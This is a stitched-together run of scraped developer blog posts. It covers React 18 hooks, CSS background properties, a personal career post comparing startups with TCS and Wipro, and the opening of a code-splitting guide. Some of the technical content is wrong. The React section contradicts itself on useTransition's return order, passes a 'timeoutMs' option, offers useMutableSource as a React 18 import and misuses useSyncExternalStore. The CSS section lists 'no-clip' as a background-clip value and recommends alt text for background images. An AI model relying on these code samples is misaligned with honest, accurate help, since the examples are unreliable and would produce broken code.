The primary goal of `useTransition` is to enable applications to stay responsive and maintain smooth animations even during heavy operations, such as data fetching, large-scale updates, or any process that might cause the UI to freeze temporarily.
Follow these steps to start using `useTransition` in your react application:
* [Update to version 18 (or higher)](https://legacy.reactjs.org/blog/2022/03/08/react-18-upgrade-guide.html): Before using the `useTransition` hook, ensure that your application is running on version 18 or higher. This hook was introduced in React 18, so you need to update your project’s dependencies accordingly.
* Import the hook: To use the `useTransition` hook, import it from the package.
```javascript
import { useTransition } from 'react';
```
* Define the Transition: Next, define the transition using the `useTransition` hook. The hook requires two arguments: the resource-intensive function and a configuration object.
```javascript
const [startTransition, isPending] = useTransition();
```
Example.
```javascript
import { useState, useTransition } from "react";
export default function App() {
const [data, setData] = useState([]);
const [isPending, startTransition] = useTransition({ timeoutMs: 3000 });
const fetchData = async () => {
startTransition(() => {
setData([]);
});
try {
const response = await fetch(
"https://jsonplaceholder.typicode.com/todos"
);
const data = await response.json();
startTransition(() => {
setData(data);
});
} catch (error) {
console.error(error);
}
};
return (
<div>
<button onClick={fetchData}> Fetch Data </button>
{isPending ? (
<p> Loading... </p>
) : (
<ul>
{data.map((item) => (
<li key={item.id}>{item.title}</li>
))}
</ul>
)}
</div>
);
}
```
In this example, we leverage the power of the `useTransition` hook in a component to orchestrate a smooth and responsive transition between different states while fetching data from an external API. The primary goal is to enhance the user experience by providing feedback during the asynchronous operation and ensuring a seamless transition between loading and displaying the fetched data. When the user clicks the "Fetch Data" button, the `fetchData` function is triggered. Inside this function, we initiate the first transition using `startTransition`. During this transition, the `setData` function is called to update the `data` state to an empty array, and the `isPending` state is set to `true`. As a result, a loading indicator is displayed, signaling to the user that data is being fetched. Simultaneously, the actual asynchronous API call is made using the `fetch` function. Upon successful retrieval of the API response, a second transition is triggered. This time, the `setData` function updates the `data` state with the fetched data, and the `isPending` state is set to `false`. Consequently, the loading indicator disappears, and the fetched data is rendered in the component.
It's important to note that the use of `useTransition` helps optimize the user interface by managing the timing and sequencing of state transitions. The provided `timeoutMs` option specifies a maximum duration for the transition, ensuring that the user interface remains responsive even if the API call takes some time to complete. Overall, this approach contributes to a more performant and user-friendly application. [Run code](https://codesandbox.io/p/sandbox/snowy-frog-ggrtpp)
Output.

## `useMutableSource`
The `useMutableSource` hook enhances the integration of external data sources or libraries within React's rendering pipeline by efficiently managing mutable data sources. This results in improved performance and facilitates smoother updates to components.
Example.
```javascript
import { useMutableSource } from 'react';
function App() {
const mutableSource = getMutableSource(); // Get the mutable source from an external library
const data = useMutableSource(mutableSource, getData, subscribe);
return <div>{data}</div>;
}
```
In this illustration, the `getMutableSource()` function is employed to acquire the mutable source from an external library. The `getData` function fetches data from this mutable source, while the `subscribe` function registers a callback to receive data updates. The `useMutableSource` hook adeptly handles the subscription process and ensures that the data variable is promptly updated whenever changes transpire in the mutable source.
<CTA_Middle_Frameworks />
## `useDeferredValue`
The `useDeferredValue` hook allows developers to defer the processing of expensive computations until later. This can help improve your application's performance by reducing the amount of work that needs to be done during each render cycle.
Example.
```javascript
import { useState, useEffect, useDeferredValue } from "react";
const AsyncOperation = () => {
const [data, setData] = useState([]);
const [page, setPage] = useState(1);
const deferredPage = useDeferredValue(page, { timeoutMs: 1000 });
const fetchData = async () => {
try {
const response = await fetch(
`https://jsonplaceholder.typicode.com/photos?_page=${deferredPage}`
);
const newData = await response.json();
setData((prevData) => [...prevData, ...newData]);
} catch (error) {
console.error(error);
}
};
useEffect(() => {
fetchData();
}, [deferredPage]);
const handleLoadMore = () => {
setPage((prevPage) => prevPage + 1);
};
return (
<div>
<button onClick={handleLoadMore}> Load More </button>
<ul>
{data.map((item) => (
<li key={item.id}>
<img src={item.thumbnailUrl} alt={item.title} width={20} />
</li>
))}
</ul>
</div>
);
};
export default AsyncOperation;
```
Output.

In this example, the `AsyncOperation` component utilizes the `useDeferredValue` hook to optimize the rendering and performance of an asynchronous data fetching operation. The primary goal is to defer the update of the `page` state by one second when the user interacts with the "Load More" button. This delay, facilitated by the `useDeferredValue` hook, optimizes the rendering process and prevents unnecessary re-renders triggered by rapid state changes. Let's break down the key aspects of the code.
Defer State with `useDeferredValue`.
```javascript
const deferredPage = useDeferredValue(page, { timeoutMs: 1000 });
```
The `useDeferredValue` hook creates a deferred version of the `page` state. This means that when the user clicks the "Load More" button, the immediate update of the `page` state is delayed by one second. During this delay, the `deferredPage` variable reflects the current state of the `page` but with a one-second lag.
Fetch Data Function.
```javascript
const fetchData = async () => {
try {
const response = await fetch(
`https://jsonplaceholder.typicode.com/photos?_page=${deferredPage}`
);
const newData = await response.json();
setData((prevData) => [...prevData, ...newData]);
} catch (error) {
console.error(error);
}
};
```
The `fetchData` function makes an asynchronous API call to fetch data based on the current `deferredPage`. This function is invoked within the `useEffect` hook, ensuring it runs whenever the deferred page changes.
`useEffect` Hook for Fetching Data.
```javascript
useEffect(() => {
fetchData();
}, [deferredPage]);
```
The `useEffect` hook is set up to execute the `fetchData` function whenever the `deferredPage` changes. Since the `deferredPage` value lags behind the actual `page` state by one second, React has a brief period to optimize rendering and avoid unnecessary updates triggered by frequent state changes.
Load More Button Handler.
```javascript
const handleLoadMore = () => {
setPage((prevPage) => prevPage + 1);
};
```
The "Load More" button click event triggers the `handleLoadMore` function, which increments the `page` state. Due to the deferred nature of `deferredPage`, React introduces a one-second delay before updating `deferredPage` to the new page value.
The utilization of the `useDeferredValue` hook in this code exemplifies a strategy to enhance the performance of components, particularly in scenarios involving user interactions leading to frequent state updates. The one-second delay introduced by `useDeferredValue` allows for strategic management rendering and ensures a more efficient handling of asynchronous data fetching operations. [Run code ](https://codesandbox.io/p/sandbox/reverent-parm-zln3zz)
## `useSyncExternalStore`
The `useSyncExternalStore` hook empowers developers to harmonize a component's state with an external store. This functionality is valuable in crafting sophisticated applications that amalgamate data from diverse sources.
```javascript
import { useState, useEffect } from 'react';
import { useSyncExternalStore } from 'react';
const MyComponent = () => {
const [count, setCount] = useState(0);
const syncExternalStore = useSyncExternalStore();
useEffect(() => {
// fetch the initial count from an external API
fetch('https://example.com/count')
.then(response => response.json())
.then(data => setCount(data.count))
.catch(error => console.error(error));
}, []);
useEffect(() => {
// sync the count value with the external store
syncExternalStore('count', count);
}, [count, syncExternalStore]);
const incrementCount = () => {
setCount(count + 1);
};
return (
<div>
<div> Count: {count} </div>
<button onClick={incrementCount}> Increment Count </button>
</div>
);
};
```
In this illustrative example, we employ the `useSyncExternalStore` hook to ensure synchronization of a count value with an external data store. To begin, we establish a `count` state variable via the `useState` hook, initializing it to 0. Subsequently, we employ the `useEffect` hook to retrieve the initial count value from an external API, updating the `count` state variable through the `setCount` method. We utilize another `useEffect` hook to synchronize the `count` value with the external store, employing the `syncExternalStore` method. This method requires two arguments: a key value identifying the data to be synchronized (here, `'count'`) and the current value of the data. Lastly, we define a`incrementCount` function responsible for incrementing the `count` state variable by 1. We then render a button that invokes this function upon clicking.
By leveraging `useSyncExternalStore`, we maintain coherence between our application state and external data stores, such as databases or caching systems. This proves particularly beneficial in the development of real-time applications or collaborative platforms requiring shared state across multiple devices or users.
## Conclusion
In summary, version 18 of React introduces a diverse range of new hooks, empowering developers to construct applications that are not only more efficient but also more accessible. By harnessing these innovative hooks, developers can craft applications with enhanced flexibility and performance, all while minimizing the necessity for redundant boilerplate code. These hooks constitute a valuable enhancement to the library, destined to become indispensable tools for developers immersed in React development.
| asayerio_techblog | |
1,881,439 | Mastering The Art Of Background Styling | by Queendarlin Nnamani CSS background properties play a pivotal role in shaping a website's visual... | 0 | 2024-06-08T16:31:32 | https://blog.openreplay.com/mastering-the-art-of-background-styling/ |
by [Queendarlin Nnamani](https://blog.openreplay.com/authors/queendarlin-nnamani)
<blockquote><em>
CSS background properties play a pivotal role in shaping a website's visual narrative. From setting the tone with colors to adding depth with images, backgrounds are more than just aesthetic elements—they're powerful storytelling tools. This article delves into the art and functionality of CSS background properties, exploring their importance in web design and their effect on user experience.
</em></blockquote>
<div style="background-color:#efefef; border-radius:8px; padding:10px; display:block;">
<hr/>
<h3><em>Session Replay for Developers</em></h3>
<p><em>Uncover frustrations, understand bugs and fix slowdowns like never before with <strong><a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a></strong> — an open-source session replay suite for developers. It can be <strong>self-hosted</strong> in minutes, giving you complete control over your customer data.</em></p>
<img alt="OpenReplay" style="margin-top:5px; margin-bottom:5px;" width="768" height="400" src="https://raw.githubusercontent.com/openreplay/openreplay/main/static/openreplay-git-hero.svg" class="astro-UXNKDZ4E" loading="lazy" decoding="async">
<p><em>Happy debugging! <a href="https://openreplay.com" target="_blank">Try using OpenReplay today.</a></em><p>
<hr/>
</div>
The CSS [background property](https://developer.mozilla.org/en-US/docs/Web/CSS/background) is a versatile toolkit that empowers you to unleash your creativity. It allows you to define background aspects like color, image, positioning, and more for individual elements. This property offers a range of sub-properties, including `background-color`, `background-image`, and more, that can be used independently or combined to achieve stunning design effects, giving you complete control over the visual narrative of your website.
## Importance of background styling in web design
Backgrounds are not just a visual backdrop in web design; they are a crucial element that shapes user experience and brand identity. Here's how:
* They are fundamental to a website's visual appeal. They set the tone by influencing the user's mood, whether light and playful with bright colors or serious and professional with muted tones. They can also create ambiance by evoking specific environments, like a calming beach scene or a bustling city street.
* They can influence how easily users can navigate and understand the content on your website. Clear and well-chosen background styles can improve readability and focus, while cluttered or distracting ones can make it difficult for users to find what they're looking for.
* They are a vital element in establishing your brand identity. They can set the tone of your website, reflecting your brand's personality and values. For example, a playful and colorful background might suit a children's clothing store, while a sleek and minimalist one might be better for a law firm's website.
* They have a profound ability to evoke emotions and convey messages. Whether using vibrant colors to convey energy or subtle textures to evoke tranquility, they contribute to the overall user experience, making it a powerful tool in your design arsenal.
* They can be used to create a visual hierarchy on a webpage. By using contrasting colors for different sections or elements, you can guide users' attention and prioritize important content.
* They can also evoke emotions in users. Images and colors can create a sense of trust, excitement, relaxation, or any other emotion you want your audience to feel. Ideally, you can create a more engaging and memorable user experience by using them.
* Websites with memorable backgrounds can significantly boost user engagement and brand recall. Striking visuals leave a lasting impression, making users more likely to revisit the site.
## Understanding CSS Background Basics
Foundational properties such as `background-color`, `background-image`, and `background-repeat` form the core elements of CSS background styling. They allow you to set colors, add images, and control image repetition for your webpage backgrounds.
Let's look at these foundational properties:
### The `background-color` Property
[The `background-color` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-color) sets a solid color for the background and is a great way to establish a base tone for your website or to highlight specific sections. It uses various color value formats such as named colors, hex codes, RGB, or HSL values. For instance, a light blue background can create a sense of calmness, while a vibrant green one might convey energy and growth.
Let's create a navigation bar with a blue background:
```html
<nav class="main-nav">
<ul>
<li><a href="#">Home</a></li>
<li><a href="#">About Us</a></li>
<li><a href="#">Contact</a></li>
</ul>
</nav>
```
```css
.main-nav {
background-color: #0000ff;
color: white;
padding: 50px;
margin: 60px;
}
a {
color: white;
font-size: 28px;
}
```
Here is the outcome:

The example above creates a navigation bar with a blue background using Hex code for the element with class `main-nav`. You can replace "#0000ff" with any valid color name, hex codes, RGB, or HSL values.
### The `background-image` Property
[The `background-image` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-image) lets you incorporate an image as the background of an element on your website. You can use this property to showcase your products or services, create a specific mood or theme, or simply enhance the overall aesthetics of your design. This can be a URL pointing to an image file or a gradient created using CSS gradient functions.
Let's set a background image of a nature scene:
```html
<div class="container">
<h1>Welcome to Our Website</h1>
<p>Discover amazing products and services.</p>
</div>
```
```css
.container {
width: 100%;
height: 600px;
background-image: url("http://wallpapercave.com/wp/soSaTJM.jpg");
color: white;
text-align: center;
padding: 20px;
font-size: 25px;
}
```
The above example sets a background image for the `.container` `<div>` element using the `background-image` property in CSS.
Here is the outcome:

### The `background-repeat` Property
[The `background-repeat` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-repeat) controls how a background image repeats itself within the element's area. It offers options like `repeat` (tiling the image), `no-repeat` (displaying the image only once), or `repeat-x` and `repeat-y` (repeating the image horizontally or vertically, respectively). Understanding this property is essential for creating seamless patterns or avoiding unwanted image distortion. In simpler terms, it's like choosing how wallpaper is applied, whether it's tiled, displayed once, or stretched.
Let's demonstrate each value of this property; the examples will use the same image so you can appreciate the effect of the different values.
* `repeat` (default value): This value tiles the image repeatedly across the entire element's area horizontally and vertically. This can be useful for creating subtle patterns using small background textures.
Here is how you can use it:
```html
<div class="container"></div>
```
```css
.container {
width: 95%;
height: 430px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.iBvR7avPLAtj8pnU537ARQHaE8&pid=Api&P=0&h=220");
background-repeat: repeat;
margin: 50px;
}
```
Here is the outcome:

In this example, the `repeat` property value creates a repeating pattern of the background image throughout the entire element's area, both horizontally and vertically.
Note: If the image is large enough to cover the entire element, then repeating it won't be visually noticeable. You'll only see a single instance of the image.
* `no-repeat` value: This value displays the image only once at its initial position within the element. It's ideal for large hero images or background elements that you want to appear only once.
Here is how you can use it:
```html
<div class="container"></div>
```
```css
.container {
width: 95%;
height: 430px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.iBvR7avPLAtj8pnU537ARQHaE8&pid=Api&P=0&h=220");
background-repeat: no-repeat;
margin: 50px;
}
```
In this example, the background image is displayed only once within the `.container` element because of the `no-repeat` property value.
Here is the outcome:

* `repeat-x` value: This value repeats the image horizontally across the element's width, tiling it from left to right. It can be used for horizontal stripes or borders.
Here is how you can use it:
```html
<div class="container"></div>
```
```css
.container {
width: 95%;
height: 300px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.iBvR7avPLAtj8pnU537ARQHaE8&pid=Api&P=0&h=220");
background-repeat: repeat-x;
}
```
In this example, the image is repeated horizontally (along the x-axis) within the `.container` element due to the `repeat-x` property value.
Here is the outcome:

* `repeat-y`: This value repeats the image vertically across the element's height, tiling it from top to bottom. It's applicable for creating vertical stripes or columnar patterns.
Here is how you can use it:
```html
<div class="container"></div>
```
```css
.container {
width: 100%;
height: 600px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.iBvR7avPLAtj8pnU537ARQHaE8&pid=Api&P=0&h=220");
background-repeat: repeat-y;
}
```
In this example, the image is repeated vertically (along the y-axis) within the `.container` element because of the `repeat-y` property value.
Here is the outcome:

## Enhancing Background Appearance with Advanced Properties
Beyond the foundational properties, CSS offers a powerful toolkit for enhancing background appearance.
Let's explore three essential properties that unlock more control over background images:
### The `background-size` Property
[The `background-size` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-size) determines how the images are scaled to fit within the element's dimensions. It allows you to control their size to fit the container or cover it without distortion.
Here are some commonly used values:
* `auto` (default) value: Attempts to fit the image within the element while preserving the aspect ratio. This might result in the image being smaller than the element or having space.
The syntax:
```css
.container {
background-size: auto;
}
```
* `contain` value: Scales the image to fit entirely within the element, maintaining its aspect ratio. If the image is smaller than the element, it won't be stretched, and space might appear around it.
The syntax:
```css
.container {
background-size: contain;
}
```
* `cover` value: Scales the image to cover the entire element area, maintaining the aspect ratio. In some cases, parts of the image might be cropped to ensure they fill the space.
The syntax:
```css
.container {
background-size: cover;
}
```
* Length values: This value sets the width and height of the image using length values such as pixels (px), percentages (%), or other units.
The syntax:
```css
.container {
background-size: 350px 250px;
}
```
This example sets the image's width to 350 pixels and the height to 250 pixels.
* `inherit` value: This value allows you to inherit the image size from the parent element
The syntax:
```css
.container {
background-size: inherit;
}
```
* `initial`: Sets the size of the image to its default value.
The syntax:
```css
.container {
background-size: initial;
}
```
Let's see a practical example of how we can resize a hero image using this property:
```html
<header class="hero">
<h1>Welcome to our wesite</h1>
<p>Where we give you the best.</p>
</header>
```
```css
.hero {
height: 500px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.iBvR7avPLAtj8pnU537ARQHaE8&pid=Api&P=0&h=220");
background-size: cover; /* Scales the image to cover the entire header area */
text-align: center;
color: white;
font-size: 28px;
}
```
This example ensures the hero image fills the entire height of the header element while maintaining its aspect ratio using the `cover` value.
Here is the outcome:

This property can accept multiple values, allowing you to combine them. However, some combinations may not make sense or have a meaningful effect. You can experiment with the different values to see how they appear.
### The `background-position` Property
[The `background-position` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-position) controls the initial placement of a background image within the element's content area. It accepts various values like keywords (`top`, `left`, `center`, `right`, and `bottom`) or coordinates (pixels or percentages). If you provide only one value, the horizontal position is set, and the vertical position defaults to `center`. Specifying two values defines both the horizontal and vertical positions.
Let's demonstrate how you can use a combination of the values. In this demonstration, you will see various ways you can use them and how they will display.
```html
<h1>top-left</h1>
<div class="container position-top-left"></div>
<h1>bottom-right</h1>
<div class="container position-bottom-right"></div>
```
```css
body {
background-color: pink;
}
.container {
width: 400px; /* Reduced width */
height: 200px; /* Reduced height */
background-image: url("https://tse3.mm.bing.net/th?id=OIP.iBvR7avPLAtj8pnU537ARQHaE8&pid=Api&P=0&h=220");
background-repeat: no-repeat; /* Ensure image is displayed only once */
}
.position-top-left {
background-position: top left; /* Positions image at top-left corner */
}
.position-bottom-right {
background-position: bottom right; /* Positions image at bottom-right corner */
}
```
Here is the outcome:

This example demonstrates how this property allows you to place the image in various positions within the container element. It displays two containers with images positioned (`position-top-left`) at the top-left corner and the second container (`position-bottom-right`) placed at the bottom-right corner.
By effectively using this property, you can achieve precise control over how background images appear within your web pages. This allows for more creative layouts and visual effects.
We've explored `background-position` for primary background image placement. Now, let's delve deeper into using `background-position-x` and `background-position-y` for more granular control over background image positioning within an element. They provide control over the horizontal and vertical positioning of the images compared to using just `background-position` with keywords like `left`, `right`, `center`, `top`, and `bottom`.
When you use the property with those keywords, you set the image's horizontal and vertical positions simultaneously. On the other hand, using `background-position-x` and `background-position-y` allows you to set the horizontal and vertical positions independently. This means you can specify the exact horizontal and vertical positions separately, providing more precise control over how the image is positioned within the element.
Let's demonstrate how you can use this property:
```html
<div class="banner"></div>
```
```css
body {
background-color: rgb(168, 159, 159);
}
.banner {
width: 430px;
height: 300px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.eacKUj-PMdmywks6GWoclAHaE7&pid=Api&P=0&h=220");
background-position-x: 100px; /* 100px from the left edge */
background-position-y: calc(100% - 300px); /* Align to bottom edge */
}
```
Here is the outcome:

In the example above, `background-position-x: 100px;` positions the image 100 pixels from the left edge of the container, and `background-position-y: calc(100% - 300px);` positions it 300 pixels from the bottom edge of the container using a calculated value. The [calc()](https://blog.openreplay.com/understanding-calc-in-css/) function allows mathematical calculations in CSS.
You can experiment with several values to achieve the desired visual layout for your webpage.
<CTA_Middle_Design />
### The `background-attachment` Property
[The `background-attachment` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-attachment) controls how a background image behaves when a webpage is scrolled. It specifies whether the image scrolls with the rest of the page's content or remains fixed in place as the page is scrolled. This can create outstanding visual effects and enhance a website's overall design.
Here is the syntax using various values of this property:
```css
background-attachment: scroll | fixed | local | initial | inherit;
```
The `scroll`(default) value enables the image to scroll along with the content when the page is scrolled. The `fixed` value makes the image remain fixed relative to the viewport. It does not move when the page is scrolled. The `local` value allows the image to scroll along with its containing element's content. However, this option is not widely supported. The `initial` value ensures the property's default value is set. The `inherit` value ensures the parent element property is inherited.
Let's demonstrate how you can use the `fixed` value for backgrounds that should remain static on your web page, such as hero images:
```html
<div class="hero">
<h1>Welcome to Our Website</h1>
</div>
<div class="content">
<h2>About Us</h2>
<p>
Lorem ipsum diolor sit, amet consaectetur adipisicing elit. Est
exercitationem, rem delectus sit eligendi, placeat repellendus error
molestiae amet commodi nesciunt dignissimos distinctio numquam. Non
quibusdam nihil perferendis omnis animi!
</p>
</div>
```
```css
.hero {
height: 100vh; /* Full viewport height */
background-image: url("https://photoshopcafe.com/wp-content/uploads/2019/02/oceanscape.jpg");
background-size: cover;
background-position: center;
background-attachment: fixed; /* Remains fixed */
text-align: center;
color: #ffffff;
display: grid;
place-items: center; /* Center content vertically and horizontally */
font-size: 28px;
}
.content {
padding: 50px;
text-align: center;
background-color: rgb(198, 198, 200);
font-size: 24px;
}
```
In this example, the web page's background image is set to cover the entire `.hero` section and remains fixed as the user scrolls the page.
Here is the outcome:

You can experiment with other values to see how they will display.
## Fine-tuning Background Behavior
We've explored essential properties for background styling in the previous sections. Now, let's delve into some advanced properties that offer even more control over how they appear and interact with other elements on your webpage:
### The `background-origin` Property
[The `backgound-origin` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-origin) determines the positioning origin of a background within its container. It specifies where the image or color starts from.
The syntax of this property using the values:
```css
background-origin: border-box | padding-box | content-box;
```
The `border-box` (default) specifies the image's origin from the container's border edge. It includes the padding and border areas. The `padding-box` defines the origin from the padding edge of the container and excludes the border area. The `content-box` specifies the background originates from the content edge of the container and excludes padding and border areas.
Let's look at an example:
```html
<div class="container border-box">
<h1>Background Origin: border-box</h1>
<p>The background originates from the border edge of the container.</p>
</div>
<div class="container content-box">
<h1>Background Origin: content-box</h1>
<p>The background originates from the content edge of the container.</p>
</div>
```
```css
body {
background-color: pink;
}
.container {
width: 70%;
margin: 20px auto;
padding: 50px;
background-image: url("https://photoshopcafe.com/wp-content/uploads/2019/02/oceanscape.jpg");
background-size: cover;
color: #ffffff;
border: 3px solid #000000;
background-repeat: no-repeat;
font-size: 20px;
}
.border-box {
background-origin: border-box;
}
.content-box {
background-origin: content-box;
}
```
In this example, the `border-box` value causes the background to start from the container's border edge, while the `content-box` value causes it to start from the content edge.
Here is the outcome

### The `background-clip` Property
[The `background-clip` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-clip) determines which parts of the element's content box the background image is clipped to. It essentially defines the visible area of the background.
The syntax of this property using the values:
```css
background-origin: border-box | padding-box | content-box | text | no-clip;
```
Here, the `border-box` (default) value clips the background to the edge of the border box, the `padding-box` value clips it to the outer edge of the padding box, and the `content-box` value clips it to the outer edge of the content box. The `text` value ensures it is only visible behind the element's text content (applicable for text highlights). The `no-clip` value does not clip it (it can potentially bleed outside the element).
Let's demonstrate how to use this property in a navigation bar to clip the background of the navigation links:
```html
<div class="navbar">
<a href="#" class="background-clip-content">Home</a>
<a href="#">About</a>
<a href="#" class="background-clip-text">Services</a>
<a href="#" class="background-clip-padding">Portfolio</a>
<a href="#" class="background-clip-no-clip">Contact</a>
</div>
```
```css
/* Navigation Bar Styles */
.navbar {
background-color: #b55353; /* color for the navigation bar */
display: flex;
padding: 20px;
margin: 50px;
}
.navbar a {
display: block;
color: white;
text-align: center;
padding: 50px;
float: left;
text-decoration: none;
background-color: #423d3d; /* color for the navigation links */
border: 2px solid rgb(181, 181, 203);
flex-grow: 1;
font-size: 24px;
}
.navbar a.background-clip-content {
background-clip: content-box;
}
.navbar a.background-clip-text {
background-clip: text; /* Clip to the text */
}
.navbar a.background-clip-padding {
background-clip: padding-box; /* Clip to the padding box */
}
.navbar a.background-clip-no-clip {
background-clip: no-clip; /* Extend beyond padding and border */
}
```
Here, these properties affect the navigation links as follows: "Home" with the `content-box` value has its background clipped to the content box, showing a little dark color due to the text content. The "Services" with `text` value clips it to the text, thereby not retaining the dark background color of the navigation bar instead of the link. "Portfolio" with a `padding-box` value clips it to the padding box, and "Contact" with a `no-clip` value extends the background beyond padding and border.
Look at the outcome:

### The `background-blend-mode` Property
[The `background-blend-mode` property](https://developer.mozilla.org/en-US/docs/Web/CSS/background-blend-mode) defines how the background image interacts with the element's background color or any underlying content. It offers various blending modes similar to those used in image editing software like Photoshop, enabling creative effects and interactions between different layers of content on a webpage.
Here are some common values and practical examples of applying blending effects for artistic backgrounds:
* `normal` (default) value: The background image/color is displayed as is without any blending with the content below.
* `multiply` value: Multiplies the colors of the background image/color with the content below, resulting in a darker overall appearance.
* `screen` value: Inverts the colors of the background image/color and then multiplies it with the content below, creating a lighter appearance (opposite of multiply).
* `overlay` value: Creates a darkening or lightening effect based on the background image's average brightness.
* `darken`: This value selects the darker of the background image/color and the content below for each pixel.
* `lighten` value: Replaces areas of the background with a lighter color from the background image/color.
* `difference` value: Subtracts the content color from the background color or vice versa, creating an inverted effect.
Let's demonstrate the effects of different values of this property:
```html
<div class="container normal">Normal (Default)</div>
<div class="container multiply">Multiply</div>
<div class="container screen">Screen</div>
<div class="container overlay">Overlay</div>
<div class="container darken">Darken</div>
<div class="container lighten">Lighten</div>
<div class="container difference">Difference</div>
```
```css
body {
display: flex;
flex-wrap: wrap; /* Allow items to wrap to the next line */
justify-content: center;
align-items: center;
background-color: #f5c7c7;
}
.container {
width: 350px;
height: 190px;
margin: 3px;
background-image: url("https://tse3.mm.bing.net/th?id=OIP.eacKUj-PMdmywks6GWoclAHaE7&pid=Api&P=0&h=220");
background-color: #dc0303;
color: rgb(237, 244, 245);
display: flex;
justify-content: center;
font-size: 26px;
border-radius: 8px;
box-sizing: border-box;
}
.normal {
background-blend-mode: normal;
}
.multiply {
background-blend-mode: multiply;
}
.screen {
background-blend-mode: screen;
}
.overlay {
background-blend-mode: overlay;
}
.darken {
background-blend-mode: darken;
}
.lighten {
background-blend-mode: lighten;
}
.difference {
background-blend-mode: difference;
}
```
Here is the outcome:

In this example, each `div` with the class `.container` has a different `background-blend-mode` property value applied to it. This provides a visual demonstration of how this property can significantly alter the appearance of background images when combined with a background color. By observing the visual effects produced by each blending mode, you can differentiate and understand which blending mode to use based on your design requirements.
You can experiment using various images to see how they interact with the different property values. Check out more on the [CSS `background-blend-mode` property](https://blog.openreplay.com/use-css-blend-modes-for-creative-image-and-color-manipulation/).
## Best Practices for Optimizing Background Images:
Optimizing background performance and ensuring it is accessible are crucial aspects of web design. Here are some best practices and guidelines for achieving both:
* Image Compression: Use compressed image formats (like JPEG or WebP) to reduce file size while maintaining quality.
* Image Size: Resize images to the exact dimensions needed, avoiding oversized images that increase load times.
* Contrast Ratio: Ensure sufficient contrast between the background image and text or content overlaid on it for readability, following WCAG guidelines.
* Alternative Text: Provide descriptive alternative text (alt text) for background images used for decorative purposes or when the image conveys essential information.
* Responsive Design: Optimize backgrounds for [responsive design](https://blog.openreplay.com/understanding-css-media-queries/) so they adapt well to different screen sizes and orientations.
## Conclusion
Mastering CSS background properties opens up a world of creative possibilities in web design. With foundational elements like background color and image to advanced elements like blending effects, dynamic positioning, and other advanced techniques, you can create dynamic and visually appealing backgrounds that enhance the overall aesthetics and functionality of your website. Experimenting with these properties and exploring their diverse effects empowers you to craft unique and memorable web experiences for your audience.
| asayerio_techblog | |
1,881,438 | What Has Tech Done For You | I wanted to be a philosopher, I loved the mystical lifestyle of Aristotle and Plato and how they... | 0 | 2024-06-08T16:29:54 | https://dev.to/scofieldidehen/what-has-tech-done-for-you-3og3 | webdev, beginners, programming, python | I wanted to be a philosopher, I loved the mystical lifestyle of Aristotle and Plato and how they questioned everything.
Imagine how innovative and powerful their minds were.
I wanted to create logical thoughts.
But during one of my lectures at college, I got an eureka moment.
I felt the need to not just think through problems but create solutions.
I looked around what problem could I solve and the problem of finding easy rentals for students came up.
I figured if students could rent houses in time and with little budget it would save them a lot.
Building the solution entails, getting the required coding skills.
That was my first dip into the waters of tech and it's been 9years.
That's my story, what's yours? | scofieldidehen |
1,881,352 | Should you join TCS, Wipro or startup as a junior software developer? | Let me first briefly tell you about myself. I am a junior software engineer in a startup. It is a... | 0 | 2024-06-08T16:25:01 | https://dev.to/yatin300701/should-you-join-tcs-wipro-or-startup-as-a-junior-software-developer-27df | fresher, develper, beginners, career | Let me first briefly tell you about myself. I am a junior software engineer in a startup. It is a product-based company which sells software for interior design to people. I was taken as a front-end developer in this.
So...What's new in it? And why have I written an article about joining startups or big companies?
Let me tell you a small story, my friend and I were searching for a job. He got a job as a Frontend Developer (React Js) in TCS, and I got the same in a startup. Fast forward to now, I met him on the weekend, and we discussed our little journey in the tech world. He was shocked when I told him the technologies I have worked on, from frontend, and backend to deploying code on AWS. In just a matter of one to two years, I have had more exposure to technology than him. Though our salaries remain the same ( we both cried on this).
Everything aside, I asked him the reason. And he told me the same as any LinkedIn post would, in big companies like TSC and Wipro which are service-based, ( I don't know about Product Based Companies like Amazon etc), junior software developers either work on fixing small bugs or are on bench when there is no work. So the growth in these companies as a developer is _Nil batee san nata_. Whereas in startups even the junior developers may have the responsibility of a feature ( it may not be something big). It teaches a lot of things as a fresher from ownership to seeing its impact on actual users.
I still remember I removed sorting on the name (as we had a search feature on it) in one table thinking no one used it. The next day we got a call from a customer who complained about sorting not working on name. Yes, my code was reviewed, and tested (our company didn't have testers, the developer was the owner of the feature so he was the tester himself, inspired by Amazon) but somehow it was missed, and guess who was blamed, **no one**.
Of course, it was a joke, I was blamed for it.
But I was not scolded for it. I was asked to fix it and within one or two hours, we deployed my fix. (So fast isn't it). Later my manager after my apology told me to never remove any feature on my own.
I don't know what would have happened in big companies, either it would have been detected earlier or I don't know.
This is one of the many mistakes that I have done and learnt from them ( Yes, I made a lot of mistakes).
I not only learned about ownership, but as I was getting a grip of one technology, our team leader started delegating more work, from deploying code on AWS to writing backend for some applications.
It made me learn more and more technologies, and I was growing.
It was not the same for my friend. It's been more than a year, and guess what his knowledge is still somewhat the same ( I am not criticizing him, he had tried learning from doing personal projects, but his speed is slow).
So should you join startups over these companies?
I would say take a step back and look what you want. Though I may have learned a lot, but still working on some Saturdays and Sundays is tiring. And we are not given extra money for overwork.
So would you be able to do it, will determine what you want (If the salary in both companies is the same).
| yatin300701 |
1,876,242 | Efficient Code Splitting in React: A Practical Guide | Introduction As your React application grows, so does the size of your bundle, which can... | 0 | 2024-06-08T16:22:40 | https://dev.to/codewithjohnson/efficient-code-splitting-in-react-a-practical-guide-273i | webdev, javascript, react, productivity | ## Introduction
As your React application grows, so does the size of your bundle, which can impact performance. Code splitting is a technique to split your code into smaller chunks that can be loaded on demand. This post will guide you through implementing code splitting in React using both JavaScript and TypeScript, with practical examples.
## Understanding Code Splitting
Before diving into the implementation, let's understand the impact of code splitting.
